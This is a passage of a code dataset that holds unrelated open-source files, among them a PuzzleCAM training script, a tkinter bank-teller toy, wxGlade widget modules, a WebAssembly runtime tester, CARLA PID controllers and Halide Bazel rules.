exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nymeria-42/dfanalyzer-with-flower","sub_path":"flowering/dfanalyzer-code/flower_server.py","file_name":"flower_server.py","file_ext":"py","file_size_in_byte":58037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40945507580","text":"import os\nfrom yaml import safe_load\n\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport pandas as pd\nimport torch\nfrom torch.nn import MSELoss, ReLU, Sequential\nfrom torch.optim import AdamW\nfrom torch.utils.data import DataLoader\n\nfrom hpa.data import RGBYDataset, N_CHANNELS, N_CLASSES\nfrom hpa.data.transforms import HPACompose\nfrom hpa.model.bestfitting.densenet import DensenetClass\nfrom hpa.model.localizers import PuzzleCAM\nfrom hpa.model.loss import FocalSymmetricLovaszHardLogLoss\nfrom hpa.utils import create_folder\nfrom hpa.utils.train import checkpoint, Logger, train_puzzlecam_epoch, test_epoch\n\n# TODO: try adding an declining scheduler for the regularization alpha hyperparameter\nif __name__ == '__main__':\n print('Training a weakly-supervised max-pooled localizer with pretrained encoder')\n\n # -------------------------------------------------------------------------------------------\n # Read in the config\n # -------------------------------------------------------------------------------------------\n CONFIG_PATH = '/home/mchobanyan/data/kaggle/hpa-single-cell/configs/puzzlecam/puzzlecam-3.yaml'\n with open(CONFIG_PATH, 'r') as file:\n config = safe_load(file)\n\n # -------------------------------------------------------------------------------------------\n # Prepare the augmentations\n # -------------------------------------------------------------------------------------------\n img_dim = config['data']['image_size']\n transform_fn = HPACompose([\n A.Resize(img_dim, img_dim),\n A.Flip(p=0.5),\n A.ShiftScaleRotate(p=0.5),\n A.Normalize(\n 
mean=[0.074598, 0.050630, 0.050891, 0.076287],\n std=[0.122813, 0.085745, 0.129882, 0.119411],\n max_pixel_value=255\n ),\n ToTensorV2()\n ])\n\n val_transform_fn = HPACompose([\n A.Resize(img_dim, img_dim, p=1.0),\n A.Normalize(\n mean=[0.074598, 0.050630, 0.050891, 0.076287],\n std=[0.122813, 0.085745, 0.129882, 0.119411],\n max_pixel_value=255\n ),\n ToTensorV2()\n ])\n\n # -------------------------------------------------------------------------------------------\n # Prepare the data\n # -------------------------------------------------------------------------------------------\n ROOT_DIR = config['data']['root_dir']\n DATA_DIR = os.path.join(ROOT_DIR, 'train')\n EXTERNAL_DATA_DIR = os.path.join(ROOT_DIR, 'misc', 'public-hpa', 'data2')\n NUM_WORKERS = 4\n\n train_idx = pd.read_csv(os.path.join(ROOT_DIR, 'full-train-index.csv'))\n # train_idx = pd.read_csv(os.path.join(ROOT_DIR, 'train-index.csv'))\n val_idx = pd.read_csv(os.path.join(ROOT_DIR, 'val-index.csv'))\n\n # train_idx = train_idx.head(32)\n # val_idx = val_idx.head(32)\n\n train_data = RGBYDataset(train_idx, DATA_DIR, external_data_dir=EXTERNAL_DATA_DIR, transforms=transform_fn)\n # train_data = RGBYDataset(train_idx, DATA_DIR, transforms=transform_fn)\n val_data = RGBYDataset(val_idx, DATA_DIR, transforms=val_transform_fn)\n\n BATCH_SIZE = config['data']['batch_size']\n train_loader = DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=NUM_WORKERS)\n val_loader = DataLoader(val_data, batch_size=BATCH_SIZE, num_workers=NUM_WORKERS)\n\n # -------------------------------------------------------------------------------------------\n # Prepare the model\n # -------------------------------------------------------------------------------------------\n DEVICE = 'cuda'\n LR = config['model']['lr']\n TILES_PER_DIM = config['model']['tiles_per_dim']\n ALPHA = config['model']['alpha']\n N_EPOCHS = config['model']['epochs']\n PRETRAINED_PATH = config['pretrained_path']\n\n densenet_model = DensenetClass(in_channels=N_CHANNELS, dropout=True)\n\n # load the pretrained DenseNet model\n if PRETRAINED_PATH != '':\n print('Loading pre-trained model')\n pretrained_state_dict = torch.load(PRETRAINED_PATH)['state_dict']\n densenet_model.load_state_dict(pretrained_state_dict)\n\n # isolate the CNN encoder\n densenet_encoder = Sequential(densenet_model.conv1,\n densenet_model.encoder2,\n densenet_model.encoder3,\n densenet_model.encoder4,\n densenet_model.encoder5,\n ReLU())\n\n # define the localizer model\n model = PuzzleCAM(densenet_encoder,\n n_classes=N_CLASSES - 1,\n tile_size=(TILES_PER_DIM, TILES_PER_DIM),\n n_hidden_filters=1024)\n\n model = model.to(DEVICE)\n\n criterion = FocalSymmetricLovaszHardLogLoss()\n reg_criterion = MSELoss()\n optimizer = AdamW(model.parameters(), lr=LR)\n\n # -------------------------------------------------------------------------------------------\n # Train the model\n # -------------------------------------------------------------------------------------------\n LOGGER_PATH = config['logger_path']\n CHECKPOINT_DIR = config['checkpoint_dir']\n create_folder(os.path.dirname(LOGGER_PATH))\n create_folder(os.path.dirname(CHECKPOINT_DIR))\n\n N_TRAIN_BATCHES = int(len(train_data) / BATCH_SIZE)\n N_VAL_BATCHES = int(len(val_data) / BATCH_SIZE)\n\n header = [\n 'epoch', 'train_loss', 'train_full_loss', 'train_tile_loss', 'train_reg_loss',\n 'val_loss', 'val_bce_loss', 'val_focal_loss'\n ]\n logger = Logger(LOGGER_PATH, header=header)\n\n best_loss = float('inf')\n for epoch in range(N_EPOCHS):\n\n 
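# Per epoch: train with Puzzle-CAM tiling enabled, then validate with tiling disabled so the plain full-image classification path is what gets scored.\n        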
model.use_tiles = True\n train_loss, train_full_loss, train_tile_loss, train_reg_loss = train_puzzlecam_epoch(model=model,\n dataloader=train_loader,\n criterion=criterion,\n reg_criterion=reg_criterion,\n optimizer=optimizer,\n device=DEVICE,\n reg_alpha=ALPHA,\n clip_grad_value=1,\n progress=True,\n epoch=epoch,\n n_batches=N_TRAIN_BATCHES)\n\n model.use_tiles = False\n val_loss, val_bce_loss, val_focal_loss = test_epoch(model,\n val_loader,\n criterion,\n DEVICE,\n calc_bce=True,\n calc_focal=True,\n progress=True,\n epoch=epoch,\n n_batches=N_VAL_BATCHES)\n\n logger.add_entry(epoch, train_loss, train_full_loss, train_tile_loss, train_reg_loss,\n val_loss, val_bce_loss, val_focal_loss)\n\n # checkpoint all epochs for now\n checkpoint(model, os.path.join(CHECKPOINT_DIR, f'model{epoch}.pth'))\n","repo_name":"martin-chobanyan/hpa-single-cell","sub_path":"scripts/train/puzzle/puzzlecam_finetuned.py","file_name":"puzzlecam_finetuned.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14432466601","text":"\"\"\"\nThis program simulate a Bank Teller.\n\"\"\"\n\n# Libraries\nimport tkinter as tk\nfrom tkinter import messagebox\n\n# Program\nclass BankTeller:\n def __init__(self):\n self.window = tk.Tk()\n self.window.title(\"Bank Teller\")\n self.secret_code = tk.StringVar()\n self.cash = 1000\n self.create_widgets()\n\n def create_widgets(self):\n secret_code_label = tk.Label(self.window, text=\"Enter your secret code: (0000)\")\n secret_code_label.pack()\n\n secret_code_entry = tk.Entry(self.window, textvariable=self.secret_code, show=\"*\")\n secret_code_entry.pack()\n\n identification_button = tk.Button(self.window, text=\"Enter\", command=self.identification)\n identification_button.pack()\n\n # Center the window\n window_width = 400\n window_height = 300\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n self.window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n self.window.mainloop()\n\n def identification(self):\n code = self.secret_code.get()\n if code == \"0000\":\n self.show_menu()\n else:\n messagebox.showerror(\"Identification\", \"Wrong code. 
Please try again.\")\n\n def show_menu(self):\n menu_window = tk.Toplevel(self.window)\n menu_window.title(\"Bank Teller Panel\")\n\n show_cash_button = tk.Button(menu_window, text=\"Show my cash\", command=self.show_cash)\n show_cash_button.pack()\n\n withdraw_button = tk.Button(menu_window, text=\"Withdraw money\", command=self.withdraw_gui)\n withdraw_button.pack()\n\n deposit_button = tk.Button(menu_window, text=\"Deposit money\", command=self.deposit_gui)\n deposit_button.pack()\n\n send_money_button = tk.Button(menu_window, text=\"Send money\", command=self.send_gui)\n send_money_button.pack()\n\n exit_button = tk.Button(menu_window, text=\"Exit\", command=self.window.destroy)\n exit_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n menu_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def show_cash(self):\n messagebox.showinfo(\"Balance\", f\"Your current balance is: {self.cash} $\")\n\n def withdraw(self, amount, window):\n try:\n amount = float(amount)\n if amount <= self.cash:\n self.cash -= amount\n messagebox.showinfo(\"Withdraw\", f\"Withdrew {amount} $. Remaining balance: {self.cash} $\")\n else:\n messagebox.showerror(\"Error\", \"Insufficient funds!\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid amount.\")\n\n window.destroy()\n\n def deposit(self, amount, window):\n try:\n amount = float(amount)\n self.cash += amount\n messagebox.showinfo(\"Deposit\", f\"Deposited {amount} $. New balance: {self.cash} $\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid amount.\")\n\n window.destroy()\n\n def send(self, receiver, amount, window):\n try:\n receiver = int(receiver)\n amount = float(amount)\n if amount <= self.cash:\n self.cash -= amount\n messagebox.showinfo(\"Send Money\", f\"Money sent successfully. 
New balance: {self.cash} $\")\n else:\n messagebox.showerror(\"Error\", \"Insufficient funds.\")\n except ValueError:\n messagebox.showerror(\"Error\", \"Invalid input.\")\n\n window.destroy()\n\n def withdraw_gui(self):\n withdraw_window = tk.Toplevel(self.window)\n withdraw_window.title(\"Withdraw Money\")\n\n amount_label = tk.Label(withdraw_window, text=\"Enter the amount to withdraw:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(withdraw_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(withdraw_window, text=\"Confirm\", command=lambda: self.withdraw(amount_entry.get(), withdraw_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n withdraw_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def deposit_gui(self):\n deposit_window = tk.Toplevel(self.window)\n deposit_window.title(\"Deposit Money\")\n\n amount_label = tk.Label(deposit_window, text=\"Enter the amount to deposit:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(deposit_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(deposit_window, text=\"Confirm\", command=lambda: self.deposit(amount_entry.get(), deposit_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n deposit_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\n def send_gui(self):\n send_window = tk.Toplevel(self.window)\n send_window.title(\"Send Money\")\n\n receiver_label = tk.Label(send_window, text=\"Enter the receiver's card number:\")\n receiver_label.pack()\n\n receiver_entry = tk.Entry(send_window)\n receiver_entry.pack()\n\n amount_label = tk.Label(send_window, text=\"Enter the amount to send:\")\n amount_label.pack()\n\n amount_entry = tk.Entry(send_window)\n amount_entry.pack()\n\n confirm_button = tk.Button(send_window, text=\"Confirm\", command=lambda: self.send(receiver_entry.get(), amount_entry.get(), send_window))\n confirm_button.pack()\n\n # Center the window\n window_width = 300\n window_height = 200\n screen_width = self.window.winfo_screenwidth()\n screen_height = self.window.winfo_screenheight()\n x_coordinate = int((screen_width - window_width) / 2)\n y_coordinate = int((screen_height - window_height) / 2)\n send_window.geometry(f\"{window_width}x{window_height}+{x_coordinate}+{y_coordinate}\")\n\nif __name__ == \"__main__\":\n bank_teller = BankTeller()\n\n","repo_name":"alejandrovt6/Python-projects","sub_path":"06-Bank-teller.py","file_name":"06-Bank-teller.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17084115273","text":"import wx\nimport common, config\nfrom edit_windows import ManagedBase, EditStylesMixin\nfrom tree import Node\nimport new_properties as np\nfrom misc import wxGladeRadioButton\n\n\nclass EditRadioButton(ManagedBase, EditStylesMixin):\n \"Class to handle wxRadioButton objects\"\n update_widget_style = False\n\n _PROPERTIES = [\"Widget\", \"label\", \"clicked\", \"style\"]\n PROPERTIES = 
ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES\n\n    def __init__(self, name, parent, id, label, sizer, pos):\n        ManagedBase.__init__(self, name, 'wxRadioButton', parent, id, sizer, pos)\n        EditStylesMixin.__init__(self)\n\n        # initialise instance properties\n        self.label = np.TextProperty(\"\", multiline=True, fixed_height=True)\n        self.clicked = np.CheckBoxProperty(False, default_value=False)\n\n        if config.preferences.default_border:\n            self.border.set( config.preferences.default_border_size )\n            self.flag.set( wx.ALL )\n\n    def create_widget(self):\n        self.widget = wxGladeRadioButton(self.parent.widget, self.id, self.label)\n        self.widget.SetValue(self.clicked)\n        # keep the preview widget pinned to its design-time 'clicked' value\n        wx.EVT_RADIOBUTTON(self.widget, self.id, lambda e: self.widget.SetValue(self.clicked))\n\n    def _set_label(self):\n        if not self.widget: return\n        self.widget.SetLabel(self.label)\n        if not self.properties['size'].is_active(): # XXX changed this: '-1, -1' is identical to not active\n            self.sizer.set_item(self.pos, size=self.widget.GetBestSize())\n\n    def properties_changed(self, modified):\n        if not modified or \"label\" in modified: self._set_label()\n\n        if (not modified or \"clicked\" in modified) and self.widget:\n            self.widget.SetValue(self.clicked)\n\n        ManagedBase.properties_changed(self, modified)\n\n\n\ndef builder(parent, sizer, pos, number=[1]):\n    \"factory function for EditRadioButton objects\"\n    label = u'radio_btn_%d' % number[0]\n    while common.app_tree.has_name(label):\n        number[0] += 1\n        label = u'radio_btn_%d' % number[0]\n    radio = EditRadioButton(label, parent, wx.NewId(), label, sizer, pos)\n    node = Node(radio)\n    radio.node = node\n    if parent.widget: radio.create()\n    common.app_tree.insert(node, sizer.node, pos-1)\n\n\ndef xml_builder(attrs, parent, sizer, sizeritem, pos=None):\n    \"factory to build EditRadioButton objects from a XML file\"\n    from xml_parse import XmlParsingError\n    try:\n        label = attrs['name']\n    except KeyError:\n        raise XmlParsingError(_(\"'name' attribute missing\"))\n    if sizer is None or sizeritem is None:\n        raise XmlParsingError(_(\"sizer or sizeritem object cannot be None\"))\n    radio = EditRadioButton(label, parent, wx.NewId(), \"\", sizer, pos)\n    sizer.set_item(radio.pos, proportion=sizeritem.proportion, flag=sizeritem.flag, border=sizeritem.border)\n    node = Node(radio)\n    radio.node = node\n    if pos is None:\n        common.app_tree.add(node, sizer.node)\n    else:\n        common.app_tree.insert(node, sizer.node, pos-1)\n    return radio\n\n\ndef initialize():\n    \"initialization function for the module: returns a wxRadioButton to be added to the main palette\"\n    common.widgets['EditRadioButton'] = builder\n    common.widgets_from_xml['EditRadioButton'] = xml_builder\n\n    return common.make_object_button('EditRadioButton', 'radio_button.xpm')\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/radio_button/radio_button.py","file_name":"radio_button.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"}
+{"seq_id":"40413890948","text":"\nimport numpy as np\nfrom scipy.special import expit\n\nX = np.array([[0.2, 3.1, 1.0], [1.0, 3.0, 1.0], [-0.2, 1.2, 1.0], [1.0, 1.1, 1.0]])\ny = np.array([[1], [1], [0], [0]])\nw0 = [[-1.0], [1.0], [0.0]]\ns0 = expit(X.dot(w0))\n\n\ndef newton(w, s, x, d):\n    pseudo_inv = np.linalg.inv(np.transpose(x).dot(x)).dot(np.transpose(x))\n    end = ((s * (1 - s)) ** -1) * (s - d)\n    return w - pseudo_inv.dot(end)\n\n\nw1 = newton(w0, s0, X, y)\ns1 
= expit(X.dot(w1))\nw2 = newton(w1, s1, X, y)\ns2 = expit(X.dot(w2))\n","repo_name":"matangrinberg/cs289","sub_path":"hw4/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"73514230489","text":"#!/home/zph/anaconda3/bin/python\nfrom pathlib import Path\nimport re\nfrom extract_dump import are_different, at_least_one_can_instantiate\nfrom exec_util import exec_one_tc, exec_one_tc_mth\nfrom extract_dump import dumpData\nfrom file_util import check_dir\nfrom file_util import print_ba\nfrom get_impls_util import get_std_impls\nimport os\nimport sys\nfrom stack_val_analyze.stack_val_analyze_util import cleanedStackVal\nfrom extract_dump.analyze_exec_instant import _get_can_execute_num\nfrom get_impls_util import get_std_release_impls\ndebug_impls = get_std_impls()\n# release_impls = get_std_release_impls()\n\n\ndef test_env(tc_name, reload=False, reload_dir=None, use_release=False):\n    if use_release:\n        # impls = release_impls\n        pass\n    else:\n        impls = debug_impls\n    for impl in impls:\n        print(impl.executor.dump_cmd_fmt)\n        print(impl.executor._result_paths)\n    if Path(tc_name).exists():\n        tc_path = tc_name\n        tc_name = Path(tc_name).stem\n    else:\n        tc_path = 'tcs/{}.wasm'.format(tc_name)\n    if reload:\n        reload_dir = Path(reload_dir)\n        name = Path(tc_path).name\n        name = re.sub(r'\\.wasm', '', name)\n        tc_dumped_data_dir = reload_dir / name\n        print(tc_dumped_data_dir)\n    else:\n        result_base_dir = 'results/one_tc_result'\n        os.system('rm -rf {}'.format(result_base_dir))\n        result_base_dir = check_dir(result_base_dir)\n        tc_dumped_data_dir = check_dir(result_base_dir / tc_name)\n    dumped_results = exec_one_tc_mth(impls, tc_path, tc_dumped_data_dir, tc_dumped_data_dir)\n\n    for dumped_result in dumped_results:\n        print(f'dumped_result.name: {dumped_result.name};;dumped_result.can_initialize: {dumped_result.can_initialize} ;; dumped_result.has_crash: {dumped_result.has_crash} {dumped_result.log_has_failed_content}')\n        print(dumped_result.stack_bytes_process_nan)\n        if dumped_result.name == 'wasm3_dump':\n            print('wasm3_dump')\n            print(dumped_result.default_mem_length, dumped_result.mem_num, dumped_result.default_mem_page_num)\n            print('------------------')\n        if dumped_result.name == 'wasmer_default_dump':\n            print('wasmer_default_dump')\n            print(dumped_result.default_mem_length, dumped_result.mem_num, dumped_result.default_mem_page_num)\n    print('---' * 10)\n\n    difference_reason = are_different(dumped_results)\n\n    diff_keys = []\n    if not isinstance(difference_reason, bool):\n        for r in difference_reason.values():\n            diff_keys.extend(r)\n    print('Difference reason:')\n    print(difference_reason)\n    print('=' * 50)\n    print(diff_keys)\n    print(at_least_one_can_instantiate(dumped_results))\n\n\nif __name__ == '__main__':\n    argv = sys.argv\n    assert len(argv) == 2\n    tc_path = argv[1]\n    test_env(tc_path, False, 'result/one',use_release=False)\n\n","repo_name":"erxiaozhou/cp912_runtime_tester","sub_path":"run_one_tc_std_testing.py","file_name":"run_one_tc_std_testing.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"570829345","text":"import socket\r\nimport win32api\r\nimport TypeDataTryd as tdt\r\nfrom TimesAndTrades.OutputTimesTrades import OutputTimesTrades\r\n\r\n#---CHOOSE THE ASSET, EXAMPLES:---------#\r\n# PETR4 - Petrobras\r\n# VALE3 - Vale\r\n# ITUB4 - Itau\r\n# INDQ19 - Bovespa Index\r\n# WINQ19 - Mini Bovespa Index\r\n#========================================#\r\nATIVO = 'WINQ19'\r\n#========================================#\r\n\r\n#---SERVER INFORMATION------------------#\r\n#========================================#\r\nHOST = '127.0.0.1'\r\nPORT = 12002\r\n#========================================#\r\n\r\n#---QUOTE OPTION------------------------#\r\n#========================================#\r\n\r\n#========================================#\r\n\r\ndef ByteConvert(dataInfo):\r\n    return str.encode(dataInfo + ATIVO + '#')\r\n\r\n# Start execution\r\nott = OutputTimesTrades()\r\ntry:\r\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n        s.connect((HOST, PORT))\r\n        print(\"Main thread id: %d\" % (win32api.GetCurrentThreadId()))\r\n        while True:\r\n            try:\r\n                s.sendall(ByteConvert(tdt.NEGOCIO_COMPLETO))\r\n                data = s.recv(32768)\r\n                ott.OutputData(data.decode())\r\n            except Exception as ex:\r\n                print(ex)\r\n\r\nexcept Exception as ex:\r\n    print('Could not connect to the RTD server. Error: ', ex)\r\n","repo_name":"romeubertho/FinancialData","sub_path":"StartConnTryd.py","file_name":"StartConnTryd.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"}
+{"seq_id":"17083754813","text":"import wx\n\nimport common, config\nfrom edit_windows import ManagedBase, EditStylesMixin\nfrom gui_mixins import BitmapMixin\nfrom tree import Node\nimport new_properties as np\n\n\nclass EditBitmapButton(ManagedBase, EditStylesMixin, BitmapMixin):\n    \"Class to handle wxBitmapButton objects\"\n\n    _PROPERTIES = [\"Widget\", \"bitmap\", \"disabled_bitmap\", \"default\", \"style\"]\n    PROPERTIES = ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES\n\n    _PROPERTY_HELP = {\"bitmap\": BitmapMixin.bitmap_tooltip_text,\n                      \"disabled_bitmap\": BitmapMixin.bitmap_tooltip_text}\n\n    def __init__(self, name, parent, id, bmp_file, sizer, pos):\n        ManagedBase.__init__(self, name, 'wxBitmapButton', parent, id, sizer, pos)\n        EditStylesMixin.__init__(self)\n        BitmapMixin.__init__(self)\n\n        # initialise instance properties\n        filedialog_style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST # for the following two properties\n        self.bitmap = np.FileNameProperty(bmp_file, style=filedialog_style)\n        self.disabled_bitmap = np.FileNamePropertyD(\"\", default_value=\"\", style=filedialog_style)\n        self.default = np.CheckBoxProperty(False)\n\n        if config.preferences.default_border:\n            self.border.set( config.preferences.default_border_size )\n            self.flag.set( wx.ALL )\n\n\n    def create_widget(self):\n        bmp = self.get_preview_obj_bitmap()\n        #try:\n        self.widget = wx.BitmapButton(self.parent.widget, self.id, bmp, style=self.style)\n        if self.disabled_bitmap:\n            bmp = self.get_preview_obj_bitmap(self.disabled_bitmap)\n            self.widget.SetBitmapDisabled(bmp)\n\n        #except AttributeError:\n        #self.widget = wx.BitmapButton(self.parent.widget, self.id, bmp)\n\n    def properties_changed(self, modified=None):\n        \"update label (and size if label/stockitem have changed)\"\n        if self.widget:\n            resize = False\n            if not modified or \"bitmap\" in modified:\n                bmp = self.get_preview_obj_bitmap(self.bitmap)\n                self.widget.SetBitmapLabel(bmp)\n                self.widget.SetBitmapSelected(bmp)\n                self.widget.SetBitmapFocus(bmp)\n                resize = True\n            if not modified or \"disabled_bitmap\" in modified:\n                bmp = self.get_preview_obj_bitmap(self.disabled_bitmap)\n                self.widget.SetBitmapDisabled(bmp)\n                resize = True\n\n            if resize: self._set_widget_best_size()\n            #size_p 
= self.properties[\"size\"]\n            #if resize and size_p.get()==\"-1, -1\":\n                #self.sizer.set_item(self.pos, size=self.widget.GetBestSize())\n                #if not size_p.is_active():\n                    #size_p.set( self.widget.GetBestSize() )\n\n        ManagedBase.properties_changed(self, modified)\n\n\ndef builder(parent, sizer, pos, number=[1]):\n    \"factory function for EditBitmapButton objects\"\n    name = 'bitmap_button_%s' % number[0]\n    while common.app_tree.has_name(name):\n        number[0] += 1\n        name = 'bitmap_button_%s' % number[0]\n    bitmap = wx.FileSelector(_(\"Select the image for the button\"))\n    button = EditBitmapButton(name, parent, wx.NewId(), bitmap, sizer, pos)\n    node = Node(button)\n    button.node = node\n    if parent.widget: button.create()\n    common.app_tree.insert(node, sizer.node, pos-1)\n\n\ndef xml_builder(attrs, parent, sizer, sizeritem, pos=None):\n    \"factory to build EditBitmapButton objects from a XML file\"\n    from xml_parse import XmlParsingError\n    try:\n        label = attrs['name']\n    except KeyError:\n        raise XmlParsingError(_(\"'name' attribute missing\"))\n    if sizer is None or sizeritem is None:\n        raise XmlParsingError(_(\"sizer or sizeritem object cannot be None\"))\n    button = EditBitmapButton(label, parent, wx.NewId(), '', sizer, pos)\n    sizer.set_item(button.pos, proportion=sizeritem.proportion, flag=sizeritem.flag, border=sizeritem.border)\n    node = Node(button)\n    button.node = node\n    if pos is None:\n        common.app_tree.add(node, sizer.node)\n    else:\n        common.app_tree.insert(node, sizer.node, pos-1)\n    return button\n\n\ndef initialize():\n    \"initialization function for the module: returns a wxBitmapButton to be added to the main palette\"\n    common.widgets['EditBitmapButton'] = builder\n    common.widgets_from_xml['EditBitmapButton'] = xml_builder\n\n    return common.make_object_button('EditBitmapButton', 'bitmap_button.xpm')\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/bitmap_button/bitmap_button.py","file_name":"bitmap_button.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"}
+{"seq_id":"34550974082","text":"import glob\nimport os\nimport sys\nimport random\nimport time\nimport numpy as np\nimport math\nimport weakref\nfrom collections import deque\n\nimport carla  # provides carla.Location, used by PIDLateralController.run_step\n\nclass PIDLongitudinalController():\n    def __init__(self, K_P=1.0, K_I=0.0, K_D=0.0, dt=0.03):\n        self._k_p = K_P\n        self._k_i = K_I\n        self._k_d = K_D\n        self._dt = dt\n        self._error_buffer = deque(maxlen=10)\n\n\n    def run_step(self, target_speed, current_speed):\n        error = target_speed - current_speed\n        self._error_buffer.append(error)\n\n        if len(self._error_buffer) >= 2:\n            _de = (self._error_buffer[-1] - self._error_buffer[-2]) / self._dt\n            _ie = sum(self._error_buffer) * self._dt\n        else:\n            _de = 0.0\n            _ie = 0.0\n\n        return np.clip((self._k_p * error) + (self._k_d * _de) + (self._k_i * _ie), -1.0, 1.0)\n    \n    def reset(self):\n        self._error_buffer.clear()\n\n\n\nclass PIDLateralController():\n    def __init__(self, offset=0, K_P=1.0, K_I=0.0, K_D=0.0, dt=0.03):\n        self._k_p = K_P\n        self._k_i = K_I\n        self._k_d = K_D\n        self._dt = dt\n        self._offset = offset\n        self._e_buffer = deque(maxlen=10)\n\n\n    def run_step(self, target_transform, vehicle_transform):\n        \"\"\"\n        Estimate the steering angle of the vehicle based on the PID equations\n\n        :param target_transform: transform of the target waypoint\n        :param vehicle_transform: current transform of the vehicle\n        :return: steering control in the range [-1, 1]\n        \"\"\"\n        # Get the ego's location and 
forward vector\n ego_loc = vehicle_transform.location\n v_vec = vehicle_transform.get_forward_vector()\n v_vec = np.array([v_vec.x, v_vec.y, 0.0])\n\n # Get the vector vehicle-target_wp\n if self._offset != 0:\n r_vec = target_transform.get_right_vector()\n w_loc = target_transform.location + carla.Location(x=self._offset*r_vec.x,\n y=self._offset*r_vec.y)\n else:\n w_loc = target_transform.location\n\n w_vec = np.array([w_loc.x - ego_loc.x,\n w_loc.y - ego_loc.y,\n 0.0])\n\n wv_linalg = np.linalg.norm(w_vec) * np.linalg.norm(v_vec)\n if wv_linalg == 0:\n _dot = 1\n else:\n _dot = math.acos(np.clip(np.dot(w_vec, v_vec) / (wv_linalg), -1.0, 1.0))\n _cross = np.cross(v_vec, w_vec)\n if _cross[2] < 0:\n _dot *= -1.0\n\n self._e_buffer.append(_dot)\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._k_p * _dot) + (self._k_d * _de) + (self._k_i * _ie), -1.0, 1.0)\n\n def reset(self):\n self._e_buffer.clear()","repo_name":"boratw/carla-sff","sub_path":"algorithm/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74326136089","text":"load(\"@bazel_skylib//lib:collections.bzl\", \"collections\")\nload(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"use_cpp_toolchain\")\n\ndef halide_language_copts():\n _common_opts = [\n \"-fPIC\",\n \"-frtti\",\n \"-Wno-conversion\",\n \"-Wno-sign-compare\",\n ]\n _posix_opts = [\n \"$(STACK_FRAME_UNLIMITED)\",\n \"-fno-exceptions\",\n \"-funwind-tables\",\n \"-fvisibility-inlines-hidden\",\n ]\n _msvc_opts = [\n \"-D_CRT_SECURE_NO_WARNINGS\",\n \"/MD\",\n ]\n return _common_opts + select({\n \"//conditions:default\": _posix_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\ndef halide_language_linkopts():\n _linux_opts = [\n \"-ldl\",\n \"-lpthread\",\n \"-lz\",\n \"-rdynamic\",\n ]\n _osx_opts = [\n \"-lz\",\n \"-Wl,-stack_size\",\n \"-Wl,1000000\",\n ]\n _msvc_opts = []\n return select({\n \"//conditions:default\": _linux_opts,\n \"@mediapipe//mediapipe:macos\": _osx_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\ndef halide_runtime_linkopts():\n \"\"\" Return the linkopts needed when linking against halide_library_runtime.\n\n Returns:\n List to be used for linkopts.\n \"\"\"\n _posix_opts = [\n \"-ldl\",\n \"-lpthread\",\n ]\n _android_opts = [\n \"-llog\",\n ]\n _msvc_opts = []\n\n return select({\n \"//conditions:default\": _posix_opts,\n 